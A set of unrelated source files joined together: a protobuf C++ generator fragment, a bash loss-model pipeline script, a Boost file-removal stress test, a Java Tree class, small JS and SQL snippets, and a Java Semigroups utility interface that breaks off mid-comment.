        printer->Print("::google::protobuf::internal::WireFormatLite::SERIALIZE,\n");
      }
      printer->Print("\"$full_name$\")", "full_name", field->full_name());
      if (for_parse) {
        // Close the surrounding DO_( opened above.
        printer->Print(")");
      }
      printer->Print(";\n");
      printer->Outdent();
      break;
    }
    case VERIFY: {
      printer->Print(
          "::google::protobuf::internal::WireFormat::$function$(\n",
          "function", verify_function);
      printer->Indent();
      printer->Print(variables, parameters);
      if (for_parse) {
        printer->Print("::google::protobuf::internal::WireFormat::PARSE,\n");
      } else {
        printer->Print("::google::protobuf::internal::WireFormat::SERIALIZE,\n");
      }
      printer->Print("\"$full_name$\");\n", "full_name", field->full_name());
      printer->Outdent();
      break;
    }
    case NONE:
      break;
  }
}
// Convenience wrapper: emit the UTF-8 check for a std::string-backed field.
void GenerateUtf8CheckCodeForString(const FieldDescriptor* field,
                                    const Options& options, bool for_parse,
                                    const std::map<string, string>& variables,
                                    const char* parameters,
                                    io::Printer* printer) {
  GenerateUtf8CheckCode(field, options, for_parse, variables, parameters,
                        "VerifyUtf8String", "VerifyUTF8StringNamedField",
                        printer);
}
// Convenience wrapper: emit the UTF-8 check for a Cord-backed field.
void GenerateUtf8CheckCodeForCord(const FieldDescriptor* field,
                                  const Options& options, bool for_parse,
                                  const std::map<string, string>& variables,
                                  const char* parameters,
                                  io::Printer* printer) {
  GenerateUtf8CheckCode(field, options, for_parse, variables, parameters,
                        "VerifyUtf8Cord", "VerifyUTF8CordNamedField", printer);
}
namespace {

// Post-order flatten: nested types are appended before their containing
// message, so every inner type precedes its parent in 'flatten'.
void Flatten(const Descriptor* descriptor,
             std::vector<const Descriptor*>* flatten) {
  const int n = descriptor->nested_type_count();
  for (int i = 0; i < n; i++) {
    Flatten(descriptor->nested_type(i), flatten);
  }
  flatten->push_back(descriptor);
}

} // namespace
// Appends every message defined in the file to 'result', nested types first
// (post-order), preserving declaration order among siblings.
void FlattenMessagesInFile(const FileDescriptor* file,
                           std::vector<const Descriptor*>* result) {
  const int n = file->message_type_count();
  for (int i = 0; i != n; i++) {
    Flatten(file->message_type(i), result);
  }
}
// Weak fields are a Google-internal feature; the open-source generator never
// emits them, so both overloads are hard-wired to false.
bool HasWeakFields(const Descriptor* descriptor) {
  return false;
}
bool HasWeakFields(const FileDescriptor* file) {
  return false;
}
// Whether implicit weak fields are enabled for this file: requires both the
// generator option and the LITE_RUNTIME optimization mode.
bool UsingImplicitWeakFields(const FileDescriptor* file,
                             const Options& options) {
  return options.lite_implicit_weak_fields &&
      GetOptimizeFor(file, options) == FileOptions::LITE_RUNTIME;
}
// Whether a specific field may be generated as an implicit weak field.
// Only optional, non-map, non-oneof message fields qualify, and only when
// they do not point at a well-known type or back into the field's own
// strongly-connected component.
bool IsImplicitWeakField(const FieldDescriptor* field, const Options& options,
                         SCCAnalyzer* scc_analyzer) {
  return UsingImplicitWeakFields(field->file(), options) &&
      field->type() == FieldDescriptor::TYPE_MESSAGE &&
      !field->is_required() && !field->is_map() &&
      field->containing_oneof() == NULL &&
      !IsWellKnownMessage(field->message_type()->file()) &&
      // We do not support implicit weak fields between messages in the same
      // strongly-connected component.
      scc_analyzer->GetSCC(field->containing_type()) !=
          scc_analyzer->GetSCC(field->message_type());
}
// Deterministic ordering for descriptors (by full name); used to stabilize
// the contents of each SCC regardless of DFS discovery order.
struct CompareDescriptors {
  // const-qualified: comparator call operators must be callable on const
  // instances (required by const-correct standard-library usage).
  bool operator()(const Descriptor* a, const Descriptor* b) const {
    return a->full_name() < b->full_name();
  }
};
// One step of Tarjan's strongly-connected-components algorithm over the
// message graph (nodes = descriptors, edges = message-typed fields).
// On return, every member of any SCC completed during this call has had its
// 'scc' pointer assigned in cache_.
// NOTE(review): recursion depth is bounded by the longest chain of
// message-typed fields; extremely deep graphs could overflow the C++ stack.
SCCAnalyzer::NodeData SCCAnalyzer::DFS(const Descriptor* descriptor) {
  // Must not have visited already.
  GOOGLE_DCHECK_EQ(cache_.count(descriptor), 0);
  // Mark visited by inserting in map.
  NodeData& result = cache_[descriptor];
  // Initialize data structures.
  result.index = result.lowlink = index_++;
  stack_.push_back(descriptor);
  // Recurse the fields / nodes in graph
  for (int i = 0; i < descriptor->field_count(); i++) {
    const Descriptor* child = descriptor->field(i)->message_type();
    if (child) {
      if (cache_.count(child) == 0) {
        // unexplored node
        NodeData child_data = DFS(child);
        result.lowlink = std::min(result.lowlink, child_data.lowlink);
      } else {
        NodeData child_data = cache_[child];
        if (child_data.scc == NULL) {
          // Still in the stack_ so we found a back edge
          result.lowlink = std::min(result.lowlink, child_data.index);
        }
      }
    }
  }
  if (result.index == result.lowlink) {
    // This is the root of a strongly connected component
    SCC* scc = CreateSCC();
    while (true) {
      const Descriptor* scc_desc = stack_.back();
      scc->descriptors.push_back(scc_desc);
      // Remove from stack
      stack_.pop_back();
      cache_[scc_desc].scc = scc;
      if (scc_desc == descriptor) break;
    }
    // The order of descriptors is random and depends how this SCC was
    // discovered. In-order to ensure maximum stability we sort it by name.
    std::sort(scc->descriptors.begin(), scc->descriptors.end(),
              CompareDescriptors());
    AddChildren(scc);
  }
  return result;
}
// Records, for a freshly completed SCC, the set of distinct child SCCs
// directly referenced by message-typed fields of its members. Edges that
// stay inside the SCC are skipped; 'seen' deduplicates children.
void SCCAnalyzer::AddChildren(SCC* scc) {
  std::set<const SCC*> seen;
  // size_t index: the original 'int i < descriptors.size()' was a
  // signed/unsigned comparison.
  for (size_t i = 0; i < scc->descriptors.size(); i++) {
    const Descriptor* descriptor = scc->descriptors[i];
    for (int j = 0; j < descriptor->field_count(); j++) {
      const Descriptor* child_msg = descriptor->field(j)->message_type();
      if (child_msg) {
        const SCC* child = GetSCC(child_msg);
        if (child == scc) continue;
        if (seen.insert(child).second) {
          scc->children.push_back(child);
        }
      }
    }
  }
}
// Computes (and memoizes) aggregate properties of a strongly connected
// component: whether any member declares extensions, required fields, cord
// fields, or is (mutually) recursive. Properties of child SCCs are folded in
// recursively; required-ness does not propagate across edges for which
// ShouldIgnoreRequiredFieldCheck() returns true.
MessageAnalysis SCCAnalyzer::GetSCCAnalysis(const SCC* scc) {
  if (analysis_cache_.count(scc)) return analysis_cache_[scc];
  MessageAnalysis result = MessageAnalysis();
  // size_t outer index; the inner loop previously reused 'i' as well,
  // shadowing the outer index — renamed to 'j' for clarity and safety.
  for (size_t i = 0; i < scc->descriptors.size(); i++) {
    const Descriptor* descriptor = scc->descriptors[i];
    if (descriptor->extension_range_count() > 0) {
      result.contains_extension = true;
    }
    for (int j = 0; j < descriptor->field_count(); j++) {
      const FieldDescriptor* field = descriptor->field(j);
      if (field->is_required()) {
        result.contains_required = true;
      }
      switch (field->type()) {
        case FieldDescriptor::TYPE_STRING:
        case FieldDescriptor::TYPE_BYTES: {
          if (field->options().ctype() == FieldOptions::CORD) {
            result.contains_cord = true;
          }
          break;
        }
        case FieldDescriptor::TYPE_GROUP:
        case FieldDescriptor::TYPE_MESSAGE: {
          const SCC* child = GetSCC(field->message_type());
          if (child != scc) {
            MessageAnalysis analysis = GetSCCAnalysis(child);
            result.contains_cord |= analysis.contains_cord;
            result.contains_extension |= analysis.contains_extension;
            if (!ShouldIgnoreRequiredFieldCheck(field, options_)) {
              result.contains_required |= analysis.contains_required;
            }
          } else {
            // This field points back into the same SCC hence the messages
            // in the SCC are recursive. Note if SCC contains more than two
            // nodes it has to be recursive, however this test also works for
            // a single node that is recursive.
            result.is_recursive = true;
          }
          break;
        }
        default:
          break;
      }
    }
  }
  // We deliberately only insert the result here. After we contracted the SCC
  // in the graph, the graph should be a DAG. Hence we shouldn't need to mark
  // nodes visited as we can never return to them. By inserting them here
  // we will go in an infinite loop if the SCC is not correct.
  return analysis_cache_[scc] = result;
}
// Appends, depth-first, every field reachable from this message: fields of
// nested messages first, then this message's extensions, then its own
// fields.
void ListAllFields(const Descriptor* d,
                   std::vector<const FieldDescriptor*>* fields) {
  // Collect sub messages
  const int nested_count = d->nested_type_count();
  for (int i = 0; i < nested_count; i++) {
    ListAllFields(d->nested_type(i), fields);
  }
  // Collect message level extensions.
  const int extension_count = d->extension_count();
  for (int i = 0; i < extension_count; i++) {
    fields->push_back(d->extension(i));
  }
  // Add types of fields necessary
  const int field_count = d->field_count();
  for (int i = 0; i < field_count; i++) {
    fields->push_back(d->field(i));
  }
}
// Appends every field declared anywhere in the file: the fields of each
// top-level message (recursively) followed by file-level extensions.
void ListAllFields(const FileDescriptor* d,
                   std::vector<const FieldDescriptor*>* fields) {
  // Collect file level message.
  const int message_count = d->message_type_count();
  for (int i = 0; i < message_count; i++) {
    ListAllFields(d->message_type(i), fields);
  }
  // Collect message level extensions.
  const int extension_count = d->extension_count();
  for (int i = 0; i < extension_count; i++) {
    fields->push_back(d->extension(i));
  }
}
void ListAllTypesForServices(const FileDescriptor* fd,
std::vector<const Descriptor*>* types) {
for (int i = 0; i < fd->service_count(); i++) {
const ServiceDescriptor* sd = fd->service(i);
for (int j = 0; j < sd->method_count(); j++) {
const MethodDescriptor* method = sd->method(j);
types->push_back(method->input_type());
types->push_back(method->output_type());
}
}
}
} // namespace cpp
} // namespace compiler
} // namespace protobuf
} // namespace google
|
#!/usr/bin/env -S bash -euET -o pipefail -O inherit_errexit
# Resolve the script's real location and run from there. The command
# substitution is quoted: the previous 'cd $(dirname ...)' word-split paths
# containing spaces.
SCRIPT=$(readlink -f "$0") && cd "$(dirname "$SCRIPT")"
# --- Script Init ---
mkdir -p log
rm -R -f log/*
# --- Setup run dirs ---
# Clear previous outputs, keeping summary-info and json artefacts.
find output -type f -not -name '*summary-info*' -not -name '*.json' -exec rm -R -f {} +
# -p: the find above only deletes files, so output/full_correlation/ can
# survive a previous run; a plain mkdir would then fail and abort the whole
# script under 'set -e'.
mkdir -p output/full_correlation/

rm -R -f fifo/*
mkdir fifo/full_correlation/
rm -R -f work/*
mkdir work/kat/
mkdir work/full_correlation/
mkdir work/full_correlation/kat/

# Per-summary work dirs consumed by leccalc/aalcalc after the main run.
mkdir work/gul_S1_summaryleccalc
mkdir work/gul_S1_summaryaalcalc
mkdir work/full_correlation/gul_S1_summaryleccalc
mkdir work/full_correlation/gul_S1_summaryaalcalc
mkdir work/il_S1_summaryleccalc
mkdir work/il_S1_summaryaalcalc
mkdir work/full_correlation/il_S1_summaryleccalc
mkdir work/full_correlation/il_S1_summaryaalcalc

# Named pipes wiring the gul/il computation stages for process 26.
mkfifo fifo/full_correlation/gul_fc_P26
mkfifo fifo/gul_P26
mkfifo fifo/gul_S1_summary_P26
mkfifo fifo/gul_S1_summary_P26.idx
mkfifo fifo/gul_S1_eltcalc_P26
mkfifo fifo/gul_S1_summarycalc_P26
mkfifo fifo/gul_S1_pltcalc_P26
mkfifo fifo/il_P26
mkfifo fifo/il_S1_summary_P26
mkfifo fifo/il_S1_summary_P26.idx
mkfifo fifo/il_S1_eltcalc_P26
mkfifo fifo/il_S1_summarycalc_P26
mkfifo fifo/il_S1_pltcalc_P26
mkfifo fifo/full_correlation/gul_P26
mkfifo fifo/full_correlation/gul_S1_summary_P26
mkfifo fifo/full_correlation/gul_S1_summary_P26.idx
mkfifo fifo/full_correlation/gul_S1_eltcalc_P26
mkfifo fifo/full_correlation/gul_S1_summarycalc_P26
mkfifo fifo/full_correlation/gul_S1_pltcalc_P26
mkfifo fifo/full_correlation/il_P26
mkfifo fifo/full_correlation/il_S1_summary_P26
mkfifo fifo/full_correlation/il_S1_summary_P26.idx
mkfifo fifo/full_correlation/il_S1_eltcalc_P26
mkfifo fifo/full_correlation/il_S1_summarycalc_P26
mkfifo fifo/full_correlation/il_S1_pltcalc_P26
# --- Do insured loss computes ---
# Readers must be started before writers: each consumer is attached to its
# fifo first, then tee fans the summary stream out to them, and finally
# summarycalc feeds the fifo chain.
eltcalc -s < fifo/il_S1_eltcalc_P26 > work/kat/il_S1_eltcalc_P26 & pid1=$!
summarycalctocsv -s < fifo/il_S1_summarycalc_P26 > work/kat/il_S1_summarycalc_P26 & pid2=$!
pltcalc -s < fifo/il_S1_pltcalc_P26 > work/kat/il_S1_pltcalc_P26 & pid3=$!
tee < fifo/il_S1_summary_P26 fifo/il_S1_eltcalc_P26 fifo/il_S1_summarycalc_P26 fifo/il_S1_pltcalc_P26 work/il_S1_summaryaalcalc/P26.bin work/il_S1_summaryleccalc/P26.bin > /dev/null & pid4=$!
tee < fifo/il_S1_summary_P26.idx work/il_S1_summaryleccalc/P26.idx > /dev/null & pid5=$!
summarycalc -m -f -1 fifo/il_S1_summary_P26 < fifo/il_P26 &
# --- Do ground up loss computes ---
eltcalc -s < fifo/gul_S1_eltcalc_P26 > work/kat/gul_S1_eltcalc_P26 & pid6=$!
summarycalctocsv -s < fifo/gul_S1_summarycalc_P26 > work/kat/gul_S1_summarycalc_P26 & pid7=$!
pltcalc -s < fifo/gul_S1_pltcalc_P26 > work/kat/gul_S1_pltcalc_P26 & pid8=$!
tee < fifo/gul_S1_summary_P26 fifo/gul_S1_eltcalc_P26 fifo/gul_S1_summarycalc_P26 fifo/gul_S1_pltcalc_P26 work/gul_S1_summaryaalcalc/P26.bin work/gul_S1_summaryleccalc/P26.bin > /dev/null & pid9=$!
tee < fifo/gul_S1_summary_P26.idx work/gul_S1_summaryleccalc/P26.idx > /dev/null & pid10=$!
summarycalc -m -i -1 fifo/gul_S1_summary_P26 < fifo/gul_P26 &
# --- Do insured loss computes ---
eltcalc -s < fifo/full_correlation/il_S1_eltcalc_P26 > work/full_correlation/kat/il_S1_eltcalc_P26 & pid11=$!
summarycalctocsv -s < fifo/full_correlation/il_S1_summarycalc_P26 > work/full_correlation/kat/il_S1_summarycalc_P26 & pid12=$!
pltcalc -s < fifo/full_correlation/il_S1_pltcalc_P26 > work/full_correlation/kat/il_S1_pltcalc_P26 & pid13=$!
tee < fifo/full_correlation/il_S1_summary_P26 fifo/full_correlation/il_S1_eltcalc_P26 fifo/full_correlation/il_S1_summarycalc_P26 fifo/full_correlation/il_S1_pltcalc_P26 work/full_correlation/il_S1_summaryaalcalc/P26.bin work/full_correlation/il_S1_summaryleccalc/P26.bin > /dev/null & pid14=$!
tee < fifo/full_correlation/il_S1_summary_P26.idx work/full_correlation/il_S1_summaryleccalc/P26.idx > /dev/null & pid15=$!
summarycalc -m -f -1 fifo/full_correlation/il_S1_summary_P26 < fifo/full_correlation/il_P26 &
# --- Do ground up loss computes ---
eltcalc -s < fifo/full_correlation/gul_S1_eltcalc_P26 > work/full_correlation/kat/gul_S1_eltcalc_P26 & pid16=$!
summarycalctocsv -s < fifo/full_correlation/gul_S1_summarycalc_P26 > work/full_correlation/kat/gul_S1_summarycalc_P26 & pid17=$!
pltcalc -s < fifo/full_correlation/gul_S1_pltcalc_P26 > work/full_correlation/kat/gul_S1_pltcalc_P26 & pid18=$!
tee < fifo/full_correlation/gul_S1_summary_P26 fifo/full_correlation/gul_S1_eltcalc_P26 fifo/full_correlation/gul_S1_summarycalc_P26 fifo/full_correlation/gul_S1_pltcalc_P26 work/full_correlation/gul_S1_summaryaalcalc/P26.bin work/full_correlation/gul_S1_summaryleccalc/P26.bin > /dev/null & pid19=$!
tee < fifo/full_correlation/gul_S1_summary_P26.idx work/full_correlation/gul_S1_summaryleccalc/P26.idx > /dev/null & pid20=$!
summarycalc -m -i -1 fifo/full_correlation/gul_S1_summary_P26 < fifo/full_correlation/gul_P26 &
# The full-correlation gul stream is duplicated: one copy is summarised
# directly, the other is pushed through fmcalc to produce insured losses.
tee < fifo/full_correlation/gul_fc_P26 fifo/full_correlation/gul_P26 | fmcalc -a2 > fifo/full_correlation/il_P26 &
# Source of the whole pipeline: events 26/40 -> model -> ground-up losses,
# with the full-correlation copy forked off via -j.
eve 26 40 | getmodel | gulcalc -S100 -L100 -r -j fifo/full_correlation/gul_fc_P26 -a1 -i - | tee fifo/gul_P26 | fmcalc -a2 > fifo/il_P26 &
wait $pid1 $pid2 $pid3 $pid4 $pid5 $pid6 $pid7 $pid8 $pid9 $pid10 $pid11 $pid12 $pid13 $pid14 $pid15 $pid16 $pid17 $pid18 $pid19 $pid20
# --- Do insured loss kats ---
kat -s work/kat/il_S1_eltcalc_P26 > output/il_S1_eltcalc.csv & kpid1=$!
kat work/kat/il_S1_pltcalc_P26 > output/il_S1_pltcalc.csv & kpid2=$!
kat work/kat/il_S1_summarycalc_P26 > output/il_S1_summarycalc.csv & kpid3=$!
# --- Do insured loss kats for fully correlated output ---
kat -s work/full_correlation/kat/il_S1_eltcalc_P26 > output/full_correlation/il_S1_eltcalc.csv & kpid4=$!
kat work/full_correlation/kat/il_S1_pltcalc_P26 > output/full_correlation/il_S1_pltcalc.csv & kpid5=$!
kat work/full_correlation/kat/il_S1_summarycalc_P26 > output/full_correlation/il_S1_summarycalc.csv & kpid6=$!
# --- Do ground up loss kats ---
kat -s work/kat/gul_S1_eltcalc_P26 > output/gul_S1_eltcalc.csv & kpid7=$!
kat work/kat/gul_S1_pltcalc_P26 > output/gul_S1_pltcalc.csv & kpid8=$!
kat work/kat/gul_S1_summarycalc_P26 > output/gul_S1_summarycalc.csv & kpid9=$!
# --- Do ground up loss kats for fully correlated output ---
kat -s work/full_correlation/kat/gul_S1_eltcalc_P26 > output/full_correlation/gul_S1_eltcalc.csv & kpid10=$!
kat work/full_correlation/kat/gul_S1_pltcalc_P26 > output/full_correlation/gul_S1_pltcalc.csv & kpid11=$!
kat work/full_correlation/kat/gul_S1_summarycalc_P26 > output/full_correlation/gul_S1_summarycalc.csv & kpid12=$!
wait $kpid1 $kpid2 $kpid3 $kpid4 $kpid5 $kpid6 $kpid7 $kpid8 $kpid9 $kpid10 $kpid11 $kpid12
|
/**
 * Shared UI layout metrics (pixels).
 */
export default {
  // Width reserved for the workspace sidebar; 0 presumably collapses it — confirm with the layout code.
  workspaceSideBarWidth: 0,
  // Inner padding applied around the selection rectangle.
  selectionRectanglePadding: 6
};
|
<reponame>vany152/FilesHash
#include <boost/filesystem.hpp>
#include <boost/thread.hpp>
#include <fstream>
#include <iostream> // BUG FIX: std::cout / std::endl are used in main() but <iostream> was never included

// NOTE(review): cond/mut are never referenced in this test — confirm they can be removed.
boost::condition_variable cond;
boost::mutex mut;

#define FNAME ("remove-test")

// Spin deleting FNAME forever. boost::filesystem::remove() is a no-op when the
// file does not exist, so two removers can race each other and the creator.
void remover()
{
    while (1)
    {
        boost::filesystem::remove(FNAME);
        // BUG FIX: the loop body contained no Boost interruption point, so the
        // interrupt()/join() calls in main() could never terminate this thread
        // and the program would hang after the creator finished.
        boost::this_thread::interruption_point();
    }
}

// Repeatedly (re)create FNAME as an empty file; each fstream temporary is
// closed immediately when it goes out of scope.
void creater()
{
    for (int i = 0; i < 100000; i++)
        std::fstream(FNAME, std::fstream::out);
}

// Stress test: removing a non-existent file must be safe, both sequentially
// and while another thread keeps re-creating it.
int main()
{
    boost::filesystem::remove(FNAME);
    boost::filesystem::remove(FNAME);
    std::cout << "If you got this far, it's OK to remove a file that doesn't exist\n"
                 "Now trying with one creator thread and two remover threads.\n"
                 "This is likely to crash after just a few seconds at most."
              << std::endl;
    boost::thread c(creater), r1(remover), r2(remover);
    c.join();
    r1.interrupt();
    r1.join();
    r2.interrupt();
    r2.join();
}
|
<filename>app/src/main/java/com/sereno/Tree.java
package com.sereno;
import java.util.ArrayList;
import java.util.List;
/** @brief Class representing a tree
* A tree is composed of multiple leaves, themselves composed of more leaves*/
public class Tree<T>
{
/** @brief Tree Listener*/
public interface ITreeListener<T>
{
/** @brief Called when a child has been added
* @param parent the parent after the addition
* @param child the child added*/
void onAddChild(Tree<T> parent, Tree<T> child);
/** @brief Called when a child has been removed
* @param parent the parent before removal
* @param child the child removed*/
void onRemoveChild(Tree<T> parent, Tree<T> child);
/** @brief Called when the extendability of a Tree changed
* @param tree the Tree changing
* @param extend the new value of the extendability*/
void onSetExtend(Tree<T> tree, boolean extend);
}
/** @brief The leaves*/
private List<Tree<T>> m_leaves = new ArrayList<>();
/** @brief The stored value*/
public T value = null;
/** @brief The listeners to call when the Tree state changes*/
private List<ITreeListener<T>> m_listeners = new ArrayList<>();
/** @brief The parent Tree*/
private Tree<T> m_parent = null;
/** Should we extend this tree?*/
private boolean m_extend = true;
/** @brief Constructor
* @param v the value bound to this Tree*/
public Tree(T v)
{
value = v;
}
/** @brief Add a new listener
* @param l the new listener*/
public void addListener(ITreeListener<T> l)
{
m_listeners.add(l);
}
/** @brief Remove an old listener
* @param l the listener to remove*/
public void removeListener(ITreeListener<T> l)
{
m_listeners.remove(l);
}
/** @brief Get the parent of this Tree
* @return The parent of the Tree*/
public Tree getParent()
{
return m_parent;
}
/** @brief Get the list of leaves containing the children data
* @return the children list*/
public List<Tree<T>> getChildren()
{
return m_leaves;
}
/** @brief Add a new child to this Tree
* @param child the child to add. If it has already a parent, the parent changes
* @param index the index to put this Tree. Value < 0 signifies that the child will be put at the end of the list*/
public void addChild(Tree<T> child, int index)
{
child.setParent(this, index);
}
/** @brief Remove a child from this Tree
* @param child the child to remove. Done only if child.parent == this*/
public void removeChild(Tree<T> child)
{
if(child.m_parent == this)
{
for(ITreeListener l : m_listeners)
l.onRemoveChild(this, child);
child.m_parent = null;
m_leaves.remove(child);
}
}
/** Should this leaf be extended?
* @return true if should be extended, false otherwise*/
public boolean getExtend()
{
return m_extend;
}
public boolean getExtendInHierarchy()
{
return m_extend && (m_parent == null || m_parent.getExtend());
}
/** Set the extendability of this Leaf
* @param extend true if should be extended, false otherwise*/
public void setExtend(boolean extend)
{
m_extend = extend;
for(ITreeListener l : m_listeners)
l.onSetExtend(this, extend);
}
/** @brief Set the parent of this Tree
* If m_parent != null, we first call remove child
* @param parent the new parent
* @param index the index in the parent children list. Value < 0 signifies that this object will be put at the end of the parent children list*/
public void setParent(Tree<T> parent, int index)
{
if(m_parent != null)
m_parent.removeChild(this);
m_parent = parent;
if(parent != null)
{
if(index < 0)
parent.m_leaves.add(this);
else
parent.m_leaves.add(index, this);
for(ITreeListener<T> l : parent.m_listeners)
l.onAddChild(parent, this);
}
}
@Override
public boolean equals(Object obj)
{
try
{
Tree l = (Tree)obj;
return l.value.equals(this.value) && m_parent == l.m_parent; //Test the equality of the object (equals) and the reference of the parent (same parent)
}
catch(Exception e)
{
return false;
}
}
} |
import { DECK_SELECT } from './index'
/**
* Set redux data when a deck is selected
*
* @param key
* @param deck
*/
/**
 * Build the action dispatched when a deck is selected.
 *
 * @param key  identifier of the selected deck
 * @param deck the deck payload itself
 * @returns a DECK_SELECT action carrying both fields
 */
export const deckSelect = ({ key, deck }) => {
  return {
    type: DECK_SELECT,
    key,
    deck,
  };
};
|
<gh_stars>0
-- ***************************************************************************
-- File: 2_36.sql
--
-- Developed By TUSC
--
-- Disclaimer: Neither Osborne/McGraw-Hill, TUSC, nor the author warrant
-- that this source code is error-free. If any errors are
-- found in this source code, please report them to TUSC at
-- (630)960-2909 ext 1011 or <EMAIL>.
-- ***************************************************************************
SPOOL 2_36.lis
-- Build a three-month reporting window from the user-supplied month/year
-- (&&input_date is expected as MMYYYY; '01' is prepended to form a full date):
--   start_date = first day of the input month
--   end_date   = last day of the month two months later
SELECT TO_DATE('01' || '&&input_date','DDMMYYYY') start_date,
       LAST_DAY(ADD_MONTHS(TO_DATE('01' ||
       '&&input_date','DDMMYYYY'),2)) end_date
  FROM DUAL;
SPOOL OFF
|
package cyclops.function.companion;
import cyclops.async.Future;
import cyclops.container.control.Either;
import cyclops.container.control.Ior;
import cyclops.container.control.Maybe;
import cyclops.container.control.Try;
import cyclops.container.immutable.ImmutableList;
import cyclops.container.immutable.impl.Bag;
import cyclops.container.immutable.impl.BankersQueue;
import cyclops.container.immutable.impl.Chain;
import cyclops.container.immutable.impl.HashSet;
import cyclops.container.immutable.impl.IntMap;
import cyclops.container.immutable.impl.LazySeq;
import cyclops.container.immutable.impl.LazyString;
import cyclops.container.immutable.impl.NonEmptyChain;
import cyclops.container.immutable.impl.NonEmptyList;
import cyclops.container.immutable.impl.Seq;
import cyclops.container.immutable.impl.TreeSet;
import cyclops.container.immutable.impl.TrieSet;
import cyclops.container.immutable.impl.Vector;
import cyclops.container.persistent.PersistentCollection;
import cyclops.function.combiner.Semigroup;
import cyclops.function.combiner.Zippable;
import cyclops.function.higherkinded.NaturalTransformation;
import cyclops.reactive.ReactiveSeq;
import cyclops.reactive.companion.Spouts;
import java.math.BigInteger;
import java.util.Collection;
import java.util.Optional;
import java.util.concurrent.CompletableFuture;
import java.util.function.BiFunction;
import java.util.function.Function;
import java.util.stream.Stream;
import org.reactivestreams.Publisher;
/**
* A static class with a large number of SemigroupK or Combiners.
* <p>
* A semigroup is an Object that can be used to combine objects of the same type.
* <p>
* Using raw Semigroups with container types
* <pre>
* {@code
* Semigroup<Maybe<Integer>> m = Semigroups.combineZippables(Semigroups.intMax);
* Semigroup<ReactiveSeq<Integer>> m = Semigroups.combineZippables(Semigroups.intSum);
* }
* </pre>
*
* @author johnmcclean
*/
public interface Semigroups {

    /**
     * Combine two Integers by summing them
     */
    Semigroup<Integer> intSum = (a, b) -> a + b;
    /**
     * Combine two Longs by summing them
     */
    Semigroup<Long> longSum = (a, b) -> a + b;
    /**
     * Combine two Doubles by summing them
     */
    Semigroup<Double> doubleSum = (a, b) -> a + b;
    /**
     * Combine two BigIntegers by summing them
     */
    Semigroup<BigInteger> bigIntSum = (a, b) -> a.add(b);
    /**
     * Combine two Integers by multiplying them
     */
    Semigroup<Integer> intMult = (a, b) -> a * b;
    /**
     * Combine two Longs by multiplying them
     */
    Semigroup<Long> longMult = (a, b) -> a * b;
    /**
     * Combine two Doubles by multiplying them
     */
    Semigroup<Double> doubleMult = (a, b) -> a * b;
    /**
     * Combine two BigIntegers by multiplying them
     */
    Semigroup<BigInteger> bigIntMult = (a, b) -> a.multiply(b);
    /**
     * Combine two Integers by selecting the max
     */
    Semigroup<Integer> intMax = (a, b) -> b > a ? b : a;
    /**
     * Combine two Longs by selecting the max
     */
    Semigroup<Long> longMax = (a, b) -> b > a ? b : a;
    /**
     * Combine two Doubles by selecting the max
     */
    Semigroup<Double> doubleMax = (a, b) -> b > a ? b : a;
    /**
     * Combine two BigIntegers by selecting the max
     */
    Semigroup<BigInteger> bigIntMax = (a, b) -> a.max(b);
    /**
     * Combine two Integers by selecting the min
     */
    Semigroup<Integer> intMin = (a, b) -> a < b ? a : b;
    /**
     * Combine two Longs by selecting the min
     */
    Semigroup<Long> longMin = (a, b) -> a < b ? a : b;
    /**
     * Combine two Doubles by selecting the min
     */
    Semigroup<Double> doubleMin = (a, b) -> a < b ? a : b;
    /**
     * Combine two BigIntegers by selecting the min
     */
    Semigroup<BigInteger> bigIntMin = (a, b) -> a.min(b);
    /**
     * String concatenation
     */
    Semigroup<String> stringConcat = (a, b) -> a + b;
    /**
     * StringBuffer concatenation (mutates and returns the first argument)
     */
    Semigroup<StringBuffer> stringBufferConcat = (a, b) -> a.append(b);
    /**
     * StringBuilder concatenation (mutates and returns the first argument)
     */
    Semigroup<StringBuilder> stringBuilderConcat = (a, b) -> a.append(b);
    /**
     * Combine two booleans by OR'ing them (disjunction)
     */
    Semigroup<Boolean> booleanDisjunction = (a, b) -> a || b;
    /**
     * Combine two booleans by XOR'ing them (exclusive disjunction)
     */
    Semigroup<Boolean> booleanXDisjunction = (a, b) -> a && !b || b && !a;
    /**
     * Combine two booleans by AND'ing them (conjunction)
     */
    Semigroup<Boolean> booleanConjunction = (a, b) -> a && b;

    /** Concatenate two persistent collections of the same concrete type. */
    static <T, C extends PersistentCollection<T>> Semigroup<C> persistentCollectionConcat() {
        return (C a, C b) -> (C) a.plusAll(b);
    }

    /** Concatenate two immutable lists of the same concrete type (b appended to a). */
    static <T, C extends ImmutableList<T>> Semigroup<C> immutableListConcat() {
        return (C a, C b) -> (C) a.appendAll(b);
    }

    static <T> Semigroup<Chain<T>> chainConcat() {
        return Semigroups.immutableListConcat();
    }

    static <T> Semigroup<NonEmptyChain<T>> nonEmptyChainConcat() {
        return Semigroups.immutableListConcat();
    }

    static <T> Semigroup<NonEmptyList<T>> nonEmptyListConcat() {
        return Semigroups.immutableListConcat();
    }

    static <T> Semigroup<LazySeq<T>> lazySeqConcat() {
        return Semigroups.immutableListConcat();
    }

    static <T> Semigroup<Seq<T>> seqConcat() {
        return Semigroups.immutableListConcat();
    }

    static <T> Semigroup<Vector<T>> vectorConcat() {
        return Semigroups.persistentCollectionConcat();
    }

    static <T> Semigroup<IntMap<T>> intMapConcat() {
        return Semigroups.persistentCollectionConcat();
    }

    static <T> Semigroup<HashSet<T>> hashSetConcat() {
        return Semigroups.persistentCollectionConcat();
    }

    static <T> Semigroup<TrieSet<T>> trieSetConcat() {
        return Semigroups.persistentCollectionConcat();
    }

    static <T> Semigroup<TreeSet<T>> treeSetConcat() {
        return Semigroups.persistentCollectionConcat();
    }

    static <T> Semigroup<Bag<T>> bagConcat() {
        return Semigroups.persistentCollectionConcat();
    }

    static <T> Semigroup<BankersQueue<T>> bankersQueueConcat() {
        return Semigroups.persistentCollectionConcat();
    }

    static <T> Semigroup<LazyString> lazyStringConcat() {
        return Semigroups.persistentCollectionConcat();
    }

    /**
     * <pre>
     * {@code
     * BinaryOperator<Seq<Integer>> sumInts = Semigroups.combineZippables(Semigroups.intSum);
     *
     * sumInts.apply(Seq.of(1,2,3), Seq.of(4,5,6));
     *
     * //List[5,7,9];
     *
     * }
     * </pre>
     *
     * @param semigroup Semigroup to combine the values inside the zippables
     * @return Combination of two Zippables
     */
    static <T, A extends Zippable<T>> Semigroup<A> combineZippables(BiFunction<T, T, T> semigroup) {
        return (a, b) -> (A) a.zip(b,
                                   semigroup);
    }

    /**
     * <pre>
     * {@code
     *
